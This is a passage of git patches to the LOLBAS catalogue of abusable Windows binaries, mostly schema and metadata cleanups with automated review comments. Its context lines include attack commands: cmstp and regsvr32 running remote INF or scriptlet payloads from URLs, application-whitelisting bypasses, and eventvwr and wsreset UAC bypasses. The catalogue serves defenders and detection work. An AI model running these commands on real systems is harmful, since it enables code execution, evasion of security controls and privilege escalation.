+++ b/yml/OtherMSBinaries/Winword.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 6884dfc..ab97c09 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -49,4 +49,3 @@ Acknowledgement: Handle: '@NotoriousRebel1' - Person: Asif Matadar Handle: '@d1r4c' ---- From ee011e6281cae3bd23ec7bd4447a99b19b124813 Mon Sep 17 00:00:00 2001 
From: xenoscr Date: Sat, 10 Sep 2022 22:21:56 -0400 Subject: [PATCH 21/60] Correcting schema --- YML-Schema.yml | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 0fb7481..f129849 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -4,20 +4,20 @@ mapping: # Id field enhancement possibility commenting out for now # "Id": # type: str -# required: yes +# required: true # pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' "Name": type: str - required: yes + required: true "Description": type: str - required: yes + required: true "Author": type: str - required: yes + required: true "Created": type: str - required: yes + required: true "Commands": type: seq sequence: @@ -25,39 +25,39 @@ mapping: mapping: "Command": type: str - required: yes + required: true "Description": type: str - required: yes + required: true "Usecase": type: str - required: yes + required: true "Category": type: str - required: yes + required: true enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload] "Privileges": type: str - required: yes + required: true "MitreID": type: str - required: yes + required: true pattern: 'T[0-9]{4}' "OperatingSystem": type: str - required: yes + required: true "Full_Path": type: seq - required: yes + required: true sequence: - type: map mapping: "Path": type: str - required: yes + required: true "Code_Sample": type: seq - required: yes + required: true sequence: - type: map mapping: @@ -65,7 +65,7 @@ mapping: type: str "Detection": type: seq - required: yes + required: true sequence: - type: map mapping: @@ -73,7 +73,7 @@ mapping: type: str "Resources": type: seq - required: yes + required: true sequence: - type: map mapping: 
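Review bot: The `MitreID` rule in the `@@ -25,39 +25,39 @@` hunk keeps `pattern: 'T[0-9]{4}'`, which does not describe the sub-technique ids the data files actually carry, such as `T1218.003` in Cmstp.yml; whether those values pass presumably depends on the validator matching only the start of the string, in which case `T1218xyz` would pass as well. Anchoring the expression and allowing the optional sub-technique suffix states the intent explicitly: `pattern: '^T[0-9]{4}(\.[0-9]{3})?$'`. The top-level `mapping:` block this hunk edits starts above the hunk.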
@@ -82,7 +82,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Acknowledgement": type: seq - required: yes + required: true sequence: - type: map mapping: From 22481bcb71a861eb8ff3711f7d3ba0ec33f55185 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:32:51 -0400 Subject: [PATCH 22/60] Updating schema file. --- YML-Schema.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/YML-Schema.yml b/YML-Schema.yml index f129849..9d5b6c1 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -71,6 +71,21 @@ mapping: mapping: "IOC": type: str + "Sigma": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Analysis": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Elastic": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Splunk": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "BlockRule": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Resources": type: seq required: true From 48ec17df1ccea837e2b37c6966e3dba83155698b Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:36:43 -0400 Subject: [PATCH 23/60] Updating schema file. --- YML-Schema.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 9d5b6c1..f0d7314 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -20,6 +20,7 @@ mapping: required: true "Commands": type: seq + required: true sequence: - type: map mapping: @@ -57,7 +58,7 @@ mapping: required: true "Code_Sample": type: seq - required: true + required: false sequence: - type: map mapping: @@ -65,7 +66,7 @@ mapping: type: str "Detection": type: seq - required: true + required: false sequence: - type: map mapping: 
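Review bot: The character class `[$-_@.&+]` in each of the five `pattern:` lines added in the `@@ -71,6 +71,21 @@` hunk is a range from `$` to `_`, so it also admits `:`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]` and `^` — far wider than the three characters it appears to list. Escaping or moving the hyphen, `[$_@.&+-]`, gives the intended set. The same expression is now repeated verbatim five times here and again in the existing `Link` rule, so one corrected copy applied everywhere is easier to keep consistent. The `Detection` mapping this hunk extends starts above the hunk.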
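Review bot: With `Detection` switched to `required: false` in the `@@ -65,7 +66,7 @@` hunk (and `Resources` and `Acknowledgement` likewise in the two hunks that follow), an entry with no detection guidance at all now validates, and that is the section defenders consume most. If the intent is only to tolerate entries whose detection is still unknown, keeping the key required and writing an explicit empty list, `Detection: []`, keeps the omission visible in review rather than silent, assuming the validator accepts an empty sequence. Note also that files such as Msxsl.yml carry `Code_Sample: - Code:` with a null value, which `type: str` may treat differently from an absent key depending on the validator.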
@@ -88,7 +89,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Resources": type: seq - required: true + required: false sequence: - type: map mapping: @@ -97,7 +98,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Acknowledgement": type: seq - required: true + required: false sequence: - type: map mapping: From 389b7e5bdd523207ac7ae4350f1cb55cdc3b40c2 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:43:02 -0400 Subject: [PATCH 24/60] Updating schema, created as date. --- YML-Schema.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index f0d7314..6c939cd 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -16,7 +16,7 @@ mapping: type: str required: true "Created": - type: str + type: date required: true "Commands": type: seq From 5e0ae9c976c4b290fa79b69e95e0646ea45e2029 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:46:13 -0400 Subject: [PATCH 25/60] Correcting Cmstp.yml Category value. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 247a27c..f4dc7d4 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass + Category: AWL bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 From 09e81d0bd10deddc49da6cda873419ea77704aea Mon Sep 17 00:00:00 2001 
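Review bot: Changing `Created` to `type: date` in the `@@ -16,7 +16,7 @@` hunk interacts with how the data files spell the value: Ieframe.yml and Setupapi.yml quote it (`Created: '2018-05-25'`), which loads as a string, while the other files leave it unquoted, which a YAML 1.1 loader turns into a date object. Unless the validator parses strings into dates itself, those two quoted files will fail the new rule. Either unquote them or, if the validator supports a `format` key on date rules, declare `format: '%Y-%m-%d'` so both spellings are handled consistently.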
From: xenoscr Date: Sat, 10 Sep 2022 22:48:08 -0400 Subject: [PATCH 26/60] Correcting Cmstp.yml Category value, case. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index f4dc7d4..8d51fef 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 From 8dd8928a8fdb72fed5118d19911d86b9692369fd Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:53:33 -0400 Subject: [PATCH 27/60] Updating gh page workflow and correcting 'AWS bypass' to 'AWS Bypass' --- .github/workflows/gh-pages.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 4e1a7c3..039ba1b 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -16,7 +16,7 @@ jobs: - name: Change .yml to .md run: | - for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done + for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts From 0ed1694bf1e21459f6f34072e7bb3bfd57a14887 Mon Sep 17 00:00:00 2001 
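Review bot: The appended `echo "---" >> "$x"` in the gh-pages.yml hunk assumes every .yml file ends with a newline; for a file that does not, the marker is glued onto the last line and the closing front-matter delimiter the renderer needs is lost. The loop also word-splits the output of `find`, so a path containing whitespace would become several `$x` values and the `mv` would fail. A guard such as `[ -z "$(tail -c1 "$x")" ] || echo >> "$x"` before the append, and `find yml/ -name '*.yml' -print0 | while IFS= read -r -d '' x; do ...; done` for the iteration, handle both. The `jobs:` block this step belongs to starts above the hunk.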
From: xenoscr Date: Sat, 10 Sep 2022 22:55:32 -0400 Subject: [PATCH 28/60] Correcting 'AWL bypass' to 'AWL Bypass' --- yml/OSBinaries/Dfsvc.yml | 2 +- yml/OSBinaries/Installutil.yml | 2 +- yml/OSBinaries/Msbuild.yml | 2 +- yml/OSBinaries/Msdt.yml | 2 +- yml/OSBinaries/Regasm.yml | 2 +- yml/OSBinaries/Regsvcs.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 4 ++-- yml/OSLibraries/Dfshim.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 2 +- 9 files changed, 10 insertions(+), 10 deletions(-) diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 15988e1..2437446 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 57d563b..8514236 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -7,7 +7,7 @@ Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 237c6cb..fe273ee 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
@@ -7,7 +7,7 @@ Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. Usecase: Compile and run code - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index d8966f0..17d027c 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,7 @@ Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index be27c04..ea30825 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -7,7 +7,7 @@ Commands: - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 33cee24..a0600d3 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml 
@@ -14,7 +14,7 @@ Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 0056fdb..0a20599 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -7,14 +7,14 @@ Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index b48fc42..5d1dfef 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 
diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 3d285b3..eefd3ab 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -14,7 +14,7 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows server From dd58662ee9fce4748668a26c8483718c62b115f1 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:58:06 -0400 Subject: [PATCH 29/60] Correcting 'UAC bypass' to 'UAC Bypass' --- yml/OSBinaries/Eventvwr.yml | 2 +- yml/OSBinaries/Wsreset.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index f2ca7e4..d5fd50e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -7,7 +7,7 @@ Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index f854c1c..86522d7 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml 
@@ -7,7 +7,7 @@ Commands: - Command: wsreset.exe Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10 From abb1034b006af5b9161bdcd78b6e6b191256b01c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:08:46 -0400 Subject: [PATCH 30/60] Added missing description to Extexport.yml --- yml/OSBinaries/Extexport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index a4a1519..14aef3f 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,6 +1,6 @@ --- Name: Extexport.exe -Description: +Description: Load a DLL located in the c:\test folder with a specific name. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: From d585695b085af52baaa3f09d480133121787cbcb Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:26:10 -0400 Subject: [PATCH 31/60] Adding missing Descriptions. --- yml/OSBinaries/Extrac32.yml | 2 +- yml/OSBinaries/Findstr.yml | 2 +- yml/OSBinaries/Ie4uinit.yml | 2 +- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Scriptrunner.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Xwizard.yml | 2 +- yml/OSScripts/CL_mutexverifiers.yml | 2 +- yml/OSScripts/Pubprn.yml | 2 +- 10 files changed, 10 insertions(+), 10 deletions(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index eb682d0..cdd087b 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml 
@@ -1,6 +1,6 @@ --- Name: Extrac32.exe -Description: +Description: Extract to ADS, copy or overwrite a file with Extrac32.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index f3f67cd..11d1273 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,6 +1,6 @@ --- Name: Findstr.exe -Description: +Description: Write to ADS, discover, or download files with Findstr.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 931710b..8fbbcc4 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,6 +1,6 @@ --- Name: Ie4uinit.exe -Description: +Description: Executes commands from a specially prepared ie4uinit.inf file. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index e4f94aa..349c645 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,6 +1,6 @@ --- Name: Runonce.exe -Description: +Description: Executes a Run Once Task that has been configured in the registry Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 9dff5c1..198d8e5 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,6 +1,6 @@ --- Name: Runscripthelper.exe -Description: +Description: Execute target PowerShell script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index bf2a128..b27b18b 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,6 +1,6 @@ --- Name: Scriptrunner.exe -Description: +Description: Execute binary through proxy binary to evade defensive counter measures Author: 'Oddvar Moe' Created: 2018-05-25 Commands: 
diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 5b4f04c..e78b91b 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -1,6 +1,6 @@ --- Name: Verclsid.exe -Description: +Description: Used to verify a COM object before it is instantiated by Windows Explorer Author: '@bohops' Created: 2018-12-04 Commands: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 61565c1..831153c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,6 +1,6 @@ --- Name: Xwizard.exe -Description: +Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 22ee4fa..6aa4d87 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,6 +1,6 @@ --- Name: CL_Mutexverifiers.ps1 -Description: +Description: Proxy execution with CL_Mutexverifiers.ps1 Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index b86d241..3972a02 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,6 +1,6 @@ --- Name: Pubprn.vbs -Description: +Description: Proxy execution with Pubprn.vbs Author: 'Oddvar Moe' Created: 2018-05-25 Commands: From 700d181c7ef973b11b3c2a9bb7297dba81215e71 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:30:36 -0400 Subject: [PATCH 32/60] Adding missing OperatingSystem key in Ilasm.yml --- yml/OSBinaries/Ilasm.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index d7187bd..3132856 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml 
@@ -17,6 +17,7 @@ Commands: Category: Compile Privileges: User MitreID: T1127 + OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe From f5baac1c45fa17314c64aa13e1c7c74b29ac24ab Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:37:10 -0400 Subject: [PATCH 33/60] Adding missing authors --- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 2 +- yml/OSLibraries/Syssetup.yml | 2 +- yml/OSLibraries/Url.yml | 2 +- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index eaae18d..99909eb 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 2a08d33..9af9e84 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 348928d..73f8ee8 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml 
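Review bot: The added `OperatingSystem: Windows 10,7` in Ilasm.yml departs from the format the other entries use, where versions are spelled out in ascending order and separated by a comma and space, and any tooling that splits or displays this field will see `10,7` as one token. Suggest `OperatingSystem: Windows 7, Windows 10`. The `Commands` item this line belongs to starts above the hunk.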
@@ -1,7 +1,7 @@ --- Name: Ieframe.dll Description: Internet Browser DLL for translating HTML code. -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 73f3388..b3a777f 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,7 +1,7 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 0a3def5..3520e26 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,7 +1,7 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index adf27be..bd9d3a8 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,7 +1,7 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index c3f5bd8..82cc9d0 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,7 +1,7 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index ea8e116..0afce49 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
